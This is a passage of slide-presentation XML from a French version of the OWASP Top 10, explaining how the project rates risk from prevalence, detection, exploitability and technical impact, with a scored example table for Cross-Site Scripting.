                        <a:t> Pour chacun des éléments du Top 10, nous avons estimé le risque type introduit par chaque vulnérabilité pour une application type en estimant le facteurs de probabilité et d’impact pour chacune des failles. Nous avons donc classé le Top 10 en fonction des vulnérabilités types qui introduisent le risque le plus important dans une application.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>La méthodologie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>définit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de nombreux facteurs pour aider au calcul du risque associé à une vulnérabilité identifiée. Cependant, le Top 10 doit parler de généralités plutôt que vulnérabilités spécifiques aux applications réelles. Par conséquent, nous ne pourrons jamais être aussi précis que peut l’être le responsable du système lorsqu’il est question de calculer les risques pesant sur leur(s) application(s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>). Vous êtes les mieux placés pour juger de l’importance de vos applications, de vos menaces, de comment votre système a été construit et comment il est géré. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Pour chaque vulnérabilité,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> notre méthodologie inclut trois facteurs de probabilité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>prévalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, Détection,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et facilité d’exploitation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>) et un facteur d’impact </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>(technique). La prévalence d’une faille est typiquement un facteur que vous n’avez pas à calculer. Pour ces données, nous avons agrégé les statistiques que nous ont fourni des entreprises d’horizons </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>variés (cf. Remerciements page 3) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>afin d’obtenir un Top 10 par prévalence. Ces données ont ensuite été combinées avec deux autres facteurs de probabilité (Détection et facilité d’exploitation) afin de calculer un ratio de probabilité pour chaque faille. Enfin celui-ci a été multiplié par l’impact technique moyen que nous avons estimé, afin d’obtenir un classement du risque global pour chaque élément du Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Il est à noter que cette approche ne prend en compte ni la probabilité des menaces ni les nombreux détails techniques propres à votre application. Tous ces facteurs peuvent grandement affecter la probabilité qu’un attaquant puisse trouver et exploiter une vulnérabilité. Ce classement ne prend pas non plus en compte les impacts effectifs sur votre activité. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>En fonction de sa culture, de son secteur et des contraintes règlementaires, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>votre organisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> devra décider quel niveau de risque est acceptable pour </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="none" baseline="0" noProof="0" smtClean="0"/>
                        <a:t>chaque application. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Le but du Top 10 OWASP n’est pas de réaliser l’analyse de risque à votre place.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Le schéma suivant illustre notre calcul pour la vulnérabilité A3: Cross-Site Scripting. Les failles XSS sont si courantes qu’elles sont les seules à être classées « TRES REPANDUE » (prévalence de valeur 0). Tous les autres risques sont classés de répandu à peu commun (valeur de 1 à 3).</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12"/>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+R</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45256558"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="114300" y="6812023"/>
          <a:ext cx="6629400" cy="2285999"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="585614">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475918">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifiques</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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitabilité</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>TRES REPANDUE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marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifiques</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24467">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0"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endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0"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endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="900"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="2400" b="1" kern="0" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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27650" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="7924800"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="8382000"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
